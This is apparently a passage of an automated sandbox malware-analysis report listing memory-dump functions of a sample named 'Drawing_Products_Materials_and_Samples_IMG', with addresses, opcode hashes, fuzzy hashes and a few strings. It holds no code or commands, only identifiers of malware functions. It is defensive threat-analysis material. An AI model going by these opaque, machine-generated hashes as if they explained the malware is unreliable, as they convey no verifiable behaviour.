                                                                                      • Opcode ID: 983ef815a29a5113ac6455738e046adceb6656fe9ec80ed0d81d8fc11c341ccd
                                                                                      • Instruction ID: ebfa2bfcd8b1ecc083632f25a5bd909980ee9dc239d89f3c674aecab239cd75d
                                                                                      • Opcode Fuzzy Hash: 983ef815a29a5113ac6455738e046adceb6656fe9ec80ed0d81d8fc11c341ccd
                                                                                      • Instruction Fuzzy Hash: 2881B374E05218CFEB58DFAAD844ADDBBF2BF89300F148069E409AB365EB305981DF54
                                                                                      Function 0011C127 Relevance: 3.9, Strings: 3, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 17842878a7ab986cd66d473983620be9c6cc0322f9a98e03d76f7356a5aeefaa
                                                                                      • Instruction ID: 65c4485154ff9075b619074d6aaccb28b755e52a60eb3fe4c6fe9607a9426f2d
                                                                                      • Opcode Fuzzy Hash: 17842878a7ab986cd66d473983620be9c6cc0322f9a98e03d76f7356a5aeefaa
                                                                                      • Instruction Fuzzy Hash: 67819374E00218CFEB58DFAAD944ADDBBF2BF89300F14D069E819AB265DB345981DF50
                                                                                      Function 0011C6D1 Relevance: 3.9, Strings: 3, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 0d77bac7913b10874ca37306d7e00daa139301442107c5e0babb18c820ed7d26
                                                                                      • Instruction ID: 853403ecf724cbb2db08f7cb4c338262f2405c9bdc78f2c6a88d2762e27fc435
                                                                                      • Opcode Fuzzy Hash: 0d77bac7913b10874ca37306d7e00daa139301442107c5e0babb18c820ed7d26
                                                                                      • Instruction Fuzzy Hash: 9281A274E01218CFEB18DFAAD984ADDFBF2BF89300F149069E419AB265DB345981DF50
                                                                                      Function 0011D23B Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: db824392f07e67521e4dd61c229244870830a628595578f3c33fb09fc0a89e84
                                                                                      • Instruction ID: eaf314aaf36572d2b4fd63b5deb4cf54a6a7b77b946a37f05e9d79c7113c668a
                                                                                      • Opcode Fuzzy Hash: db824392f07e67521e4dd61c229244870830a628595578f3c33fb09fc0a89e84
                                                                                      • Instruction Fuzzy Hash: 2481B574E01218CFEB18DFAAD944ADDBBF2BF88300F148069E419AB765DB345981DF11
                                                                                      Function 0011C400 Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 585502ee82b38ecf0a592e99a94e4f2943b0713b287141a7ff3149d138c4bbfd
                                                                                      • Instruction ID: 5d8e261d0c527d5c66e213b64b9d0de515865682523e8ea793e136f2eed3978e
                                                                                      • Opcode Fuzzy Hash: 585502ee82b38ecf0a592e99a94e4f2943b0713b287141a7ff3149d138c4bbfd
                                                                                      • Instruction Fuzzy Hash: AC81A374E00218CFEB58DFAAD944A9DBBF2BF88300F14D069E409AB365DB349981DF50
                                                                                      Function 0011CC88 Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: 77b0dd5ecb4f2d6e755a852ca3a7cc150b224a2a4d49f04144c0c490403a3abb
                                                                                      • Instruction ID: 0e29d2f2887635b5aba67a62bb3f4e6b54ec3021f1ad842ecdc99af6d92b863e
                                                                                      • Opcode Fuzzy Hash: 77b0dd5ecb4f2d6e755a852ca3a7cc150b224a2a4d49f04144c0c490403a3abb
                                                                                      • Instruction Fuzzy Hash: 5F81B374E41218CFEB58DFAAD944ADDBBF2BF89300F148069E409AB365DB345981DF50
                                                                                      Function 0011CF63 Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      • Opcode ID: a4c62c2af670cde88739972f3e4f76d3aef7fd1bd89adf398679a4a4c9543a37
                                                                                      • Instruction ID: 5b93ac2d5e39ad6e3972f1cc04feb65f61ca9ad345c1f574cdfe3c37d6900417
                                                                                      • Opcode Fuzzy Hash: a4c62c2af670cde88739972f3e4f76d3aef7fd1bd89adf398679a4a4c9543a37
                                                                                      • Instruction Fuzzy Hash: 3F81A374E00218DFEB58DFAAD944ADDBBF2BF89300F148069E419AB365DB345982DF50
                                                                                      Function 373D6572 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7'e=$77b=
                                                                                      • API String ID: 0-1236949558
                                                                                      • Opcode ID: d72aaa023129d5e893d3f73f8d843583861cbca720b876dbaf5a9a05ad354a65
                                                                                      • Instruction ID: 9a4fa761e07ddd4af4f53f420d7e4532771e3c20f78b67b947e77c7d3174c0e1
                                                                                      • Opcode Fuzzy Hash: d72aaa023129d5e893d3f73f8d843583861cbca720b876dbaf5a9a05ad354a65
                                                                                      • Instruction Fuzzy Hash: B7517BB0D05748CBDB15DFAAC99079DBBB2BF8A300F20C17AC428AB251DB344946CF61
                                                                                      Function 37585E48 Relevance: 2.4, Strings: 1, Instructions: 1121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]q
                                                                                      • API String ID: 0-2967776592
                                                                                      • Opcode ID: a66f8abd400cc73c1fa76a79364ea1bfe22a1670126578e2581c82e5ffccc16c
                                                                                      • Instruction ID: 9ac93c94f3311068ba4544048f80a8eb3367e835fc90b920cb973f02ac07b822
                                                                                      • Opcode Fuzzy Hash: a66f8abd400cc73c1fa76a79364ea1bfe22a1670126578e2581c82e5ffccc16c
                                                                                      • Instruction Fuzzy Hash: 4BC2B474A01229CFDB69DF24C994BA9BBB2FB89315F1081E9D809A7355CB359E81CF40
                                                                                      Function 37584278 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4
                                                                                      • API String ID: 0-4088798008
                                                                                      • Opcode ID: eee37ce3592eb972fc8d6d5c05569e183aa013484dd7feb5a3bae52109c1ed45
                                                                                      • Instruction ID: 8b9df24052091aa867d05e1c3aecf8e4b3286c66b50d119e13a423ad2028c87f
                                                                                      • Opcode Fuzzy Hash: eee37ce3592eb972fc8d6d5c05569e183aa013484dd7feb5a3bae52109c1ed45
                                                                                      • Instruction Fuzzy Hash: 0C414871E016189BEB68CF6BD94479EFAF3AFC9300F14C1AAC54CA6254DB740A85CF51
                                                                                      Function 00112D74 Relevance: 1.0, Instructions: 1003COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6682d3fdf52cd69635e826bcb5332387bfc84b8e370558f100857c8ef0a75f2
                                                                                      • Instruction ID: 755d0fdc1809e4cec96806b4c2ac3f684d89aa7207d021384b0b3212b4d87782
                                                                                      • Opcode Fuzzy Hash: b6682d3fdf52cd69635e826bcb5332387bfc84b8e370558f100857c8ef0a75f2
                                                                                      • Instruction Fuzzy Hash: 7582303295A351DFDB9A4F348C142D97BF0AF93329B6741FAC8414A962E73D4883CB52
                                                                                      Function 3758625E Relevance: .8, Instructions: 773COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c069c7a83f9377f608d49ce5194aaaef22b4d2b2ce166564179f69a09644ad6
                                                                                      • Instruction ID: ac286fd964bf1831cbf4c049e29f56aefff012bc17772bae54f06e7e1edd365d
                                                                                      • Opcode Fuzzy Hash: 9c069c7a83f9377f608d49ce5194aaaef22b4d2b2ce166564179f69a09644ad6
                                                                                      • Instruction Fuzzy Hash: CA82B274A05228CFDB68DF24C994BADBBB2FB89315F1045E9D809A7355CB35AE81CF40
                                                                                      Function 3741DD58 Relevance: .7, Instructions: 747COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d3574ae23efcdcd24a273e3b2081f08c475f73a2d3498253ca7347385b8a475
                                                                                      • Instruction ID: 05ffab0de61fe25b0233cf52c8e9b2c766ed20007b33496dc492e3e28720516a
                                                                                      • Opcode Fuzzy Hash: 9d3574ae23efcdcd24a273e3b2081f08c475f73a2d3498253ca7347385b8a475
                                                                                      • Instruction Fuzzy Hash: F5826E74E052288FEBA4DF69C994BDDBBB2BB89301F1081E9D40DA7265DB705E81DF40
                                                                                      Function 36A90B30 Relevance: .7, Instructions: 711COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28e2770583a0464a0dccdf16a5feef7fdba4bd3d8b96df8f13e7f809ad80af25
                                                                                      • Instruction ID: e00374a59bfe62888acd43ad69164a36d9fa1cfcde634480050c3c9398036149
                                                                                      • Opcode Fuzzy Hash: 28e2770583a0464a0dccdf16a5feef7fdba4bd3d8b96df8f13e7f809ad80af25
                                                                                      • Instruction Fuzzy Hash: 0A72B474E052288FEB64DF69C984BDDBBF2BB49304F6481E9D808A7255DB349E81CF50
                                                                                      Function 00116D68 Relevance: .5, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 586b494e423c90ce1be6ef42d05c0ad34416630aad117a81d0991aebdf681f29
                                                                                      • Instruction ID: ff46a910a63c237289f1efe62a6fb2c23a834d898b306d5398263775f930dac7
                                                                                      • Opcode Fuzzy Hash: 586b494e423c90ce1be6ef42d05c0ad34416630aad117a81d0991aebdf681f29
                                                                                      • Instruction Fuzzy Hash: 0F127070B042199FEB18DF69C854BAEBBB6FF89300F248569E405EB391DB359D41CB90
                                                                                      Function 00117360 Relevance: .5, Instructions: 454COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dab6fb3d9dc36109f2fc664cbaffaf3741940057740df11a1140f8191538bfff
                                                                                      • Instruction ID: d78a1dc28e6cf9de840d7d957db02f923337dfc26ba5dcf8fb0c5c5327a1afe4
                                                                                      • Opcode Fuzzy Hash: dab6fb3d9dc36109f2fc664cbaffaf3741940057740df11a1140f8191538bfff
                                                                                      • Instruction Fuzzy Hash: B6024C71A04119DFDB18DF69C988AEDBBB2FF89310F15806AE415AB3A1E730DD81CB51
                                                                                      Function 36A99158 Relevance: .4, Instructions: 359COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41b1fc8078479fc24553d8b0794da0feda40e8f106925e73b43f738942b6a4ef
                                                                                      • Instruction ID: 3a399f082fa4826e64cb953fdec0b9886246e078301ccee9234c25c4305ffae8
                                                                                      • Opcode Fuzzy Hash: 41b1fc8078479fc24553d8b0794da0feda40e8f106925e73b43f738942b6a4ef
                                                                                      • Instruction Fuzzy Hash: 2FF1D474E052189FEB14DFA9C984B9DFBF2BF88304F6481A9D808AB255DB349985CF50
                                                                                      Function 373D5FE0 Relevance: .3, Instructions: 302COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a46d9649fee7f375c9e21d4d6cd83a50534bda357dc1b75e3092ba01589db11d
                                                                                      • Instruction ID: 039e91cadac9faf7b5da8b19580da8b19653fe690671ef2469bd05883ea5b637
                                                                                      • Opcode Fuzzy Hash: a46d9649fee7f375c9e21d4d6cd83a50534bda357dc1b75e3092ba01589db11d
                                                                                      • Instruction Fuzzy Hash: 51E1CEB4E01218CFEB64DFA9C980B9DBBF2BF89300F2081A9D418B7255DB355A85CF55
                                                                                      Function 37367B88 Relevance: .3, Instructions: 298COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f565af6250212f51bc27ee90481a2c27ddf6ae2c861e0f0c61b3017b961bc4e
                                                                                      • Instruction ID: e2352b13891c97a8af09140d2b2428c6841e36177ef351c5f545411f45954b61
                                                                                      • Opcode Fuzzy Hash: 0f565af6250212f51bc27ee90481a2c27ddf6ae2c861e0f0c61b3017b961bc4e
                                                                                      • Instruction Fuzzy Hash: CBE1C074E01218CFEB54DFA5C984BDDBBB2BF89304F2081AAD408B7294DB355A85DF15
                                                                                      Function 37401CF0 Relevance: .3, Instructions: 294COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5148d6e3e4f3dfd71b1e3530068826a5ec658008d2b7617ae2d8eecc2c964cdf
                                                                                      • Instruction ID: e00d3d796620c5e3e5e5bac69cd6e68df8289d35b11e6eff8d785125f83fff9d
                                                                                      • Opcode Fuzzy Hash: 5148d6e3e4f3dfd71b1e3530068826a5ec658008d2b7617ae2d8eecc2c964cdf
                                                                                      • Instruction Fuzzy Hash: 2DD19F74E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB354DB359E85CF51
                                                                                      Function 373D6688 Relevance: .3, Instructions: 294COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e3fc21d97387ae4b7e317f5441ce026741e70b8b391e72f234da6b027bfe189
                                                                                      • Instruction ID: 42fb33301d65b9216d94a234b1fe024c1c4a417aa7609ec53c4eb46d89d0856a
                                                                                      • Opcode Fuzzy Hash: 9e3fc21d97387ae4b7e317f5441ce026741e70b8b391e72f234da6b027bfe189
                                                                                      • Instruction Fuzzy Hash: 7DD19E74E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB354DB359E85CF51
                                                                                      Function 373693C0 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb64875ecb25fcdf0bd65b36cd32b4dc39edebbef42d9d1eaf2229af7d78e08d
                                                                                      • Instruction ID: 08488940aa126f7c3a6c9a2dd4c2343bc0b6d30f75b4bedc468dd02748856ab3
                                                                                      • Opcode Fuzzy Hash: bb64875ecb25fcdf0bd65b36cd32b4dc39edebbef42d9d1eaf2229af7d78e08d
                                                                                      • Instruction Fuzzy Hash: F2D19274E003188FDB54DFA5C984B9DBBB2BF89300F2081A9D809BB355DB355A82DF55
                                                                                      Function 373D36C8 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ed3772b0f6d0a0128326d2f8e867a8adeace890d85fb1a30095a200da14836f
                                                                                      • Instruction ID: 90dfb961fee63ba879b0f85452a8823d00714b7a8cabcbe3f774b91e5864ba57
                                                                                      • Opcode Fuzzy Hash: 8ed3772b0f6d0a0128326d2f8e867a8adeace890d85fb1a30095a200da14836f
                                                                                      • Instruction Fuzzy Hash: CBD19F74E013188FEB54DFA9C990B9DBBB2BF89300F2081A9D409BB354DB355A82DF55
                                                                                      Function 36A92580 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4003580ba156f82eed41dbe072d028e9910e4e1e6471e3358eb99e767fcd432c
                                                                                      • Instruction ID: b3b44f9e203d87f1bb44e4cdc6e63d83e746a615c469b8058ecba38bc0dd396d
                                                                                      • Opcode Fuzzy Hash: 4003580ba156f82eed41dbe072d028e9910e4e1e6471e3358eb99e767fcd432c
                                                                                      • Instruction Fuzzy Hash: 75C1AE74E01318CFEB54DFA5C944B9DBBB2BF89305F2081A9D809AB354DB359A86CF14
                                                                                      Function 37362300 Relevance: .3, Instructions: 270COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd10a1b302b7966606ac0289548769fe733ddf2e3f68eeb63b83a60d6d6d7bbc
                                                                                      • Instruction ID: c6cceb9d9ff30b4fa90a48225cf6eb4d77e095a4b86f65348ed77fe37c6303fc
                                                                                      • Opcode Fuzzy Hash: cd10a1b302b7966606ac0289548769fe733ddf2e3f68eeb63b83a60d6d6d7bbc
                                                                                      • Instruction Fuzzy Hash: CDC1B074E04318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Function 375850F0 Relevance: .2, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7822677040ca5d3eb00780c8d03ce12f021f7df2f6696a298d85b8f24391dce
                                                                                      • Instruction ID: de51e763854812d82dfcac102f0fd5ac3405012c81eaf61e01c7857b6f94de80
                                                                                      • Opcode Fuzzy Hash: f7822677040ca5d3eb00780c8d03ce12f021f7df2f6696a298d85b8f24391dce
                                                                                      • Instruction Fuzzy Hash: 50915175E10215DFEB14AFB0D8587EEBBB2EB06756F00542AD102772D1CBB88A86CF54
                                                                                      Function 36A92B50 Relevance: .2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48c976397ca0ac1ac9c356bc612799b4831c09056b9f29ec99caca9e7546def7
                                                                                      • Instruction ID: 5e110d27149cae0733ebd7dd55f7c6120ded2912dd2365143d554847bb4fb029
                                                                                      • Opcode Fuzzy Hash: 48c976397ca0ac1ac9c356bc612799b4831c09056b9f29ec99caca9e7546def7
                                                                                      • Instruction Fuzzy Hash: 80A1E074D102088FEB14DFA9C984BDDBBF1FF89304F208269E409AB292DB759985CF55
                                                                                      Function 36A94C23 Relevance: .2, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3402c5ac6d9e15e32d782bb00cc13d4dc5b3830ebd930a2593d9406237a1c225
                                                                                      • Instruction ID: 15039e8997c25dffdce7d11510d4189cba7434de1b034d19af567b67905253f2
                                                                                      • Opcode Fuzzy Hash: 3402c5ac6d9e15e32d782bb00cc13d4dc5b3830ebd930a2593d9406237a1c225
                                                                                      • Instruction Fuzzy Hash: 69A1E371D106198EDB14DFA9C844BDDFBF1EF89304F20C2AAD4186B261EB709A85CF51
                                                                                      Function 36A92B60 Relevance: .2, Instructions: 224COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0ff3f08890561881016a2a79676334cdb6b20b41a45db8d743cb212a18aaf28
                                                                                      • Instruction ID: 0f7f34c8b91432179bdd80b5c91b83a9814637998b23268052a0f6c6a66288e0
                                                                                      • Opcode Fuzzy Hash: e0ff3f08890561881016a2a79676334cdb6b20b41a45db8d743cb212a18aaf28
                                                                                      • Instruction Fuzzy Hash: CEA1D074D102088FEB14DFA9C944BDDBBF1FF89314F208269E409AB291DB749985CF59
                                                                                      Function 36A91E98 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
